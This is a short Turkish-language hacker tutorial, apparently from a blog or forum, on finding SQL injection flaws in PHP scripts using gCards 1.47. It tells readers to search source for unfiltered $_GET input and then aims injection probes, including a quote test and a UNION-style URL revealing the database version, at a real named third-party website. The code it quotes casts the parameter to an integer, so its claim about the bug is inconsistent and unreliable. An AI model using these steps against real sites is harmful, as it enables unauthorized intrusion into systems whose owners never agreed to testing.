bugün sizlere scriptlerde bug bulmayı anlatıcam.(SQL)
Bu script'te daha önce bulunmuş exploit-db'den zaten buldum script'i hani boşu boşuna gelip bulunmuş
demeyin sadece anlatım için kullanıyorum.Birde sen konuyu açıyorsun ama 1 tane bile açık bulduğunu görmedik
diyenler ve düşünenler içinde şuanda benim kendime ait buldum 20-30 tane açık var ama yayınlamıyorum.
Graytendril biliyor(gray'dada sağlam şeyler var ona göre :D)Yayınlamamamın nedeni paylaştıkça cılkı çıkıyor.
Adamlar Türk sitelerine index atıyorlar.Yani ben bunu istemiyorum açıkcası bende kalsın :)
Neyse amma konuştum daha başlamadan şimdi öncelikle bizim bulacağımız sql injection bug'ıdir.Yani sql ile ilgili
scipt'teki sql injection açığı.
gCards 1.47 üzerinden göstericem ben.
indirme linki : http://www.gregphoto.net/gcards/down...gcards1.47.zip
İndiriyoruz ve dosyaları temiz bir yere çıkarıyoruz.
<?php
$id= $_GET[’id’];
......................................
$query= "SELECT * FROM users WHERE id= ’ “ .$id." ;"
......................................
?>
Burada ne var filtrelenme yok yani '^+^+&+/%)/ gibi özel karakterlerin filan filtrelenmesi lazım.
Bizde script'te bu tip şeyler arıcaz.
Ben script'teki php dosyalarını notepad ++ ile açıcam.Sizede öneririm iyidir.
Scriptteki dosyalarda arama yapıyoruz.
Bir script'te arıyacaklarımız : $_GET , SELECT * FROM'dur.
Ve getnewsitem.php dosyasında şöyle bir kod çıktı.
$newsid = (int) $_GET['newsid']; $getNewsSQL = "SELECT * from ".$tablePrefix."news WHERE newsid=$newsid";
Açığın bulunduğu dosya bu.
Bulduk şimdi bakıcaz sistemde bu açık nerede acep nerede bulunuyor.
Denemelik sitemiz bu : http://floridacards.com/gcards/
Açık getnewsitem.php dosyasındaydı o zaman.
http://floridacards.com/gcards/getnewsitem.php
news WHERE newsid=$newsid";
olduğu için doğal olarak;
http://floridacards.com/gcards/getnewsitem.php?newsid=1
Şeklindedir.
siteye bakarsanız ;
http://floridacards.com/gcards/getnewsitem.php?newsid=1
dediğnizdeki yazılara bakın sonrada ' koydun
http://floridacards.com/gcards/getnewsitem.php?newsid=1'
bakın değişikliği göreceksiniz.
http://floridacards.com/gcards/getne...on%28%29,4,5--
version 5.1.56-log
İşte script'te açık buldunuz ister yayınlayın ister size kalsın...
Mr.PaPaRoSSe / DarkDevilZ / :& = elim kolum bağlı...
Hiç yorum yok:
Yorum Gönder